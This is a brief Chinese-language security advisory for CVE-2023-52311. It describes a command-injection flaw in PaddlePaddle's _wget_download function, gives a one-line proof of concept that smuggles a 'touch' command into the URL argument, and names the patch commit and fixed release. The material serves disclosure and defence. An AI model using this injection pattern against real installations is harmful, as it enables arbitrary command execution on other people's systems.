CVE-2023-52311
_wget_download
存在命令注入漏洞,可造成任意命令执行,PoC代码如下:
from paddle import utils
utils.download._wget_download("aa; touch codexecution", "bb")
我们在commit d5550d3f2f5bab48c783b4986ba1cd8e061ce542中对此问题进行了补丁。 修复将包含在飞桨2.6.0版本当中。
请参考我们的安全指南以获得更多关于安全的信息,以及如何与我们联系问题。
此漏洞由 huntr.com 提交。